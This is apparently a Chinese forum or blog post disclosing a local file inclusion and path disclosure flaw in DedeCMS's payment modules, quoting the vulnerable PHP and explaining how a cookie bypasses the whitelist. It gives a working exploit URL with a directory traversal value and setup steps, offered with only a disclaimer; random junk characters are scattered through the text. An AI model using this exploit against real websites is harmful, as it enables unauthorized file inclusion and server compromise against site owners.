dedecms本地文件包含及物理路径泄露0day

admin

晚餐吃撑了，瞄下代码消化消化。最近Php0day群里的兄弟都在讨论dede洞多，赶紧下了套，用editplus搜索了几个关键字，果然发现些问题。(话说平时写代码也喜欢用editplus，小巧方便多年习惯)

9 R  P2 _- G# C4 G/ w出现漏洞的两个文件为：
Include/payment/alipay.php
Include/payment/yeepay.php
漏洞均出现在respond方法里，估计这两个文件是临时工写的。

Include/payment/alipay.php
. P6 }$ n9 \6 O$ f
' h$ V& G$ d5 r9 e7 u......
   function respond()
    {
( B  L3 s7 q: W3 w7 M& }        if (!empty($_POST))
        {
+ D- i( a! z& j5 w7 t            foreach($_POST as $key => $data)
            {
                $_GET[$key] = $data;
            }
. b+ e1 P5 A& r; M        }
$ X0 d* ^6 ]) T/ e7 o% M+ D        /* 引入配置文件 */
7 d8 S# h; Z% a; [, ~4 s        require_once DEDEDATA.'/payment/'.$_GET['code'].'.php';
5 n+ Q! m8 M9 w3 `- A  Q+ F......

9 @& L2 ~" B2 y1 N9 x- o
5 u% _' p% M4 Y  h大概在133行左右，$_GET[‘code’]没有经过任何判断和过滤。

% I( ^, Q" f; ^4 v: W5 u: Z( Q+ z2 oInclude/payment/yeepay.php
2 k% r5 W2 e) C4 S+ B

2 Y/ L: p3 a- u; H
......
1 d' c3 `5 h9 C( u8 K3 R% c    function respond()
! l" L" n, S" e* }. W$ ^2 S& Y    {

0 B1 l/ ?' a6 _7 I8 }# ~2 P        /* 引入配置文件 */
        require_once DEDEDATA.'/payment/'.$_REQUEST['code'].'.php';

. }- w# v* s; ^9 a& y, ?2 f6 Q        $p1_MerId = trim($payment['yp_account']);
) N/ Z; P% b$ i: ]- z" w& i3 R1 D        $merchantKey = trim($payment['yp_key']);
& s' {% L1 w0 O3 g# i......
- |3 E" J4 U- l, h( T6 n7 \

/ j0 `& y( B% O0 p$ g: x

大概在145行左右，$_REQUEST['code']没有经过任何判断和过滤。
' Q! g* ^* J* J3 S* U
这两个方法在plus/carbuyaction.php文件调用。

' V4 s+ N# J1 a# yplus/carbuyaction.php
/ V2 S+ V% B' v$ u+ g
......
} else if ($dopost == 'return') {
    $write_list = array('alipay', 'bank', 'cod', 'yeepay');
    if (in_array($code, $write_list))
    {
3 i! _3 y- [* _, N6 L9 [# f2 b        require_once DEDEINC.'/payment/'.$code.'.php';
( P4 m# i; F3 ]% w: V. v  o        $pay = new $code;
        $msg=$pay->respond();
% U8 P6 I, |. i. Z9 |) s        ShowMsg($msg, "javascript:;", 0, 3000);
" u+ D3 w5 I( O2 ~6 l        exit();  
    } else {
1 K  S9 e  e* P2 {        exit('Error:File Type Can\'t Recognized!');
    }
}
- e8 x& z5 r' r, W$ j$ t: }$ K1 I......


; Z' j1 Z6 t/ S- Q; [# s
& x* {* @$ f% R' ?5 g/ m. J
3 q% y  ]0 {+ S; L, S4 [1 B

大概在334行，当$dopost等于return的时候就开始进入过程了。熟悉dedecms朋友都知道在include/common.inc.php使用了一种类似register_globals的机制。
所以$_GET['code']或$_REQUEST['code']会变成$code，而$code是经过判断的，值必须在$write_list数组以内这样才能继续后面的流程调用respond方法触发漏洞。这样的话貌似就无法控制$_GET['code']为任意值了。

  {7 i' b7 n  F' h# K回到include/common.inc.php来看看他的机制。
3 D& m& U+ q$ @- w% a1 K

( A' ]4 Y3 I7 V4 P! O% `
  c' P# |# U1 U2 M9 U......
! n: W8 L  j1 p$ ^, A5 Y% s8 p8 ]foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
8 @. I# R9 R/ O4 e0 r3 W        foreach($$_request as $_k => $_v)
% N6 @$ ]% T  Y. w8 Z2 l; L        {
5 c7 l2 J8 _' w8 ]3 E2 t8 Z                if($_k == 'nvarname') ${$_k} = $_v;
                else ${$_k} = _RunMagicQuotes($_v);
        }
}
......
! L$ d: E9 P' C2 t8 q/ ?7 ?大概在79行，可以看到他是从$_GET,$_POST,$_COOKIE这三个全局变量里取值的。嘿嘿，细心点就发现了吧。从他这个优先机制来讲他是先从get再从post再从cookie也就是说最终$code会是以$_COOKIE[‘code’]的值为准，而我们要控制的是$_GET[‘code’]或$_REQUEST['code']只须要$code的值在$write_list数组以内就行了。Exp:http://www.php0day.com/plus/carb ... amp;code=../../tags上面的Exp是包含根目录下的tags.php文件包含其他后缀请自行构造截断，使用exp测试时须要自己添加一个code等于alipay或yeepay的cookie。暴路径:
9 R4 W4 T# U5 y+ u" l! T% i由于bank和cod这两个文件并没有respond方法，所以如果code等于bank或者cod时将会暴错泄露路径。注：请勿非法测试，产生后果与本人无关。